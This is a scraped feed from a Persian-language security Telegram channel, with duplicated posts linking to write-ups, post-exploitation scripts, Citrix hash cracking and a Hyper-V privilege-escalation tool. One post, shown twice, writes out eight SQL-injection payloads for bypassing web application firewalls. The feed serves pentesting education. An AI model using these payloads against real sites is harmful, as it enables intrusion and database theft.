پیشنهادات NSA در خصوص امنیت سیستم های ابری
https://media.defense.gov/2020/Jan/22/2002237484/-1/-1/0/CSI-MITIGATING-CLOUD-VULNERABILITIES_20200121.PDF
#nsa
#cloud
#security
@sec_nerd
https://media.defense.gov/2020/Jan/22/2002237484/-1/-1/0/CSI-MITIGATING-CLOUD-VULNERABILITIES_20200121.PDF
#nsa
#cloud
#security
@sec_nerd
رایت آپ چالش HTB با نام Hawk
https://medium.com/@ranakhalil101/hack-the-box-hawk-writeup-w-o-metasploit-da80d51defcd
#writeup
#htb
@sec_nerd
https://medium.com/@ranakhalil101/hack-the-box-hawk-writeup-w-o-metasploit-da80d51defcd
#writeup
#htb
@sec_nerd
رایت آپ چالش HTB با نام Lightweight
https://medium.com/@ranakhalil101/hack-the-box-lightweight-writeup-w-o-metasploit-855a5fcf7b82
#writeup
#htb
@sec_nerd
https://medium.com/@ranakhalil101/hack-the-box-lightweight-writeup-w-o-metasploit-855a5fcf7b82
#writeup
#htb
@sec_nerd
رایت آپهای مرتبط با ضعف آپلودرها
Unrestricted file upload
https://link.medium.com/sILCWr8xB3
https://link.medium.com/V8SdaJ8xB3
https://noobe.io/articles/2019-09/exploiting-cookie-based-xss-by-finding-rce
https://link.medium.com/6qTQZwayB3
https://anotherhackerblog.com/exploiting-file-uploads-pt-2
https://link.medium.com/1wFiIWayB3
https://link.medium.com/5rv5CbbyB3
https://mustafakemalcan.com/asus-rce-vulnerability-on-rma-asus-europe-eu
https://link.medium.com/jFGhtvbyB3
https://link.medium.com/fRfag0byB3
#bougbounty
#writeup
#pentest
#web
@sec_nerd
Unrestricted file upload
https://link.medium.com/sILCWr8xB3
https://link.medium.com/V8SdaJ8xB3
https://noobe.io/articles/2019-09/exploiting-cookie-based-xss-by-finding-rce
https://link.medium.com/6qTQZwayB3
https://anotherhackerblog.com/exploiting-file-uploads-pt-2
https://link.medium.com/1wFiIWayB3
https://link.medium.com/5rv5CbbyB3
https://mustafakemalcan.com/asus-rce-vulnerability-on-rma-asus-europe-eu
https://link.medium.com/jFGhtvbyB3
https://link.medium.com/fRfag0byB3
#bougbounty
#writeup
#pentest
#web
@sec_nerd
Medium
Dank Writeup On Broken Access Control On An Indian Startup
This writeup is about a critical broken access control along with unrestricted file upload on the server. This company had a bug bounty…
لیست بدافزارهای اندرویدی فعال و توضیح یک خطی در مورد نحوه فعالیت هرکدام
https://forensics.spreitzenbarth.de/android-malware/
#android
#malware
@sec_nerd
https://forensics.spreitzenbarth.de/android-malware/
#android
#malware
@sec_nerd
رتبه بندی کشورهای میزبان سرورهای کنترل کننده بات نت ها در سال ۲۰۱۹
(توی بیست تای اول نیستیم)
https://www.spamhaus.org/news/article/793/
#news
#botnet
@sec_nerd
(توی بیست تای اول نیستیم)
https://www.spamhaus.org/news/article/793/
#news
#botnet
@sec_nerd
مجموعه اسکریپت های مفید برای عملیات پسانفوذ
https://github.com/mubix/post-exploitation
#post_exploitation
#windows
#privesc
#lateral_movement
@sec_nerd
https://github.com/mubix/post-exploitation
#post_exploitation
#windows
#privesc
#lateral_movement
@sec_nerd
GitHub
GitHub - mubix/post-exploitation: Post Exploitation Collection
Post Exploitation Collection. Contribute to mubix/post-exploitation development by creating an account on GitHub.
Cross-Site Websocket Hijacking bug in Facebook that leads to account takeover
https://ysamm.com/?p=363
#writeup
#facebook
#bugbounty
@sec_nerd
https://ysamm.com/?p=363
#writeup
#bugbounty
@sec_nerd
امنیت اطلاعات
شکستن هش های Citrix Netscaler با hashcat https://github.com/hashcat/hashcat/commit/53105abeb47a6c325dee6714b1503cd68bd0c9c8 #hashcat #citrix @sec_nerd
رمزگشایی مقادیر استخراج شده از کانفیگ Citrix
https://dozer.nz/citrix-decrypt/
#citrix
#shitrix
@sec_nerd
https://dozer.nz/citrix-decrypt/
#citrix
#shitrix
@sec_nerd
dozer.nz
Citrix Netscaler config decryption
hacking and technology
هشت روش برای دور زدن WAF در حملات تزریق SQL
1.Nullbyte:
%00' UNION SELECT password FROM Users WHERE username-'tom'--
2. SQL Comments:
'/**/UN/**/ION/**/SEL/**/ECT/**/password/**/FR/OM/**/Users/**/WHE/**/RE/**/usersame/**/LIKE/**/'tom'--
3. URL encoding:
%252f%252a*/UNION%252f%252a*/SELECT%252f%252a*/password%252f%252a*/FROM%252f%252a*/Users%252f%25a*/WHERE%252f%252a*/username%252f%252a*/LIKE%252f%252a*/'tom'--
4. Changing Cases:
UniOn AlL SeLeCt/*inc0gbyt3*/select/**/1,2,3,4,5 --
5. HTTP Parameter Pollution (HPP):
Regular attack SQLi hxxps://www.xxx.com/noticias.php?id=1 union select 1,2 --
HPP attack + SQLi: hxxps://www.xxx.com/noticias.php?id=1&id=*/union/*&id=*/select/*&id=*/1,2+--+
6. Replacing keywords technique
hxxps://www.xxx.com/artigos.php?id=123+UnIoN+SeLselectECT+1,2,3,4,5--
7. CRLF WAF Bypass (Carriage Return, Line Feed) - Common on (aspxasp) applications
Putting theses chars at the beggining of payload
%0A%0d+select+user+from+dual+%0A%0D
8. Buffer Overflow bypassing:
and (select 1) = (select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ..... A's)
https://incogbyte.github.io/sqli_waf_bypass/
#sqli
#WAF
#web
#pentest
@sec_nerd
1.Nullbyte:
%00' UNION SELECT password FROM Users WHERE username-'tom'--
2. SQL Comments:
'/**/UN/**/ION/**/SEL/**/ECT/**/password/**/FR/OM/**/Users/**/WHE/**/RE/**/usersame/**/LIKE/**/'tom'--
3. URL encoding:
%252f%252a*/UNION%252f%252a*/SELECT%252f%252a*/password%252f%252a*/FROM%252f%252a*/Users%252f%25a*/WHERE%252f%252a*/username%252f%252a*/LIKE%252f%252a*/'tom'--
4. Changing Cases:
UniOn AlL SeLeCt/*inc0gbyt3*/select/**/1,2,3,4,5 --
5. HTTP Parameter Pollution (HPP):
Regular attack SQLi hxxps://www.xxx.com/noticias.php?id=1 union select 1,2 --
HPP attack + SQLi: hxxps://www.xxx.com/noticias.php?id=1&id=*/union/*&id=*/select/*&id=*/1,2+--+
6. Replacing keywords technique
hxxps://www.xxx.com/artigos.php?id=123+UnIoN+SeLselectECT+1,2,3,4,5--
7. CRLF WAF Bypass (Carriage Return, Line Feed) - Common on (aspxasp) applications
Putting theses chars at the beggining of payload
%0A%0d+select+user+from+dual+%0A%0D
8. Buffer Overflow bypassing:
and (select 1) = (select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ..... A's)
https://incogbyte.github.io/sqli_waf_bypass/
#sqli
#WAF
#web
#pentest
@sec_nerd
سرقت توکن های CSRF با استفاده از XSS
https://sametsahin.net/posts/steal-csrf-tokens-with-simple-xss/
#xss
#csrf
@sec_nerd
https://sametsahin.net/posts/steal-csrf-tokens-with-simple-xss/
#xss
#csrf
@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
بالابردن سطح دسترسی از ادمین Hyper-v به یوزر SYSTEM در آخرین نسخه ی پچ شده ی ویندوز ۱۰
https://decoder.cloud/2020/01/20/from-hyper-v-admin-to-system/
ابزار:
https://github.com/decoder-it/Hyper-V-admin-EOP/
#windows
#privesc
#hyper_v
@sec_nerd
https://decoder.cloud/2020/01/20/from-hyper-v-admin-to-system/
ابزار:
https://github.com/decoder-it/Hyper-V-admin-EOP/
#windows
#privesc
#hyper_v
@sec_nerd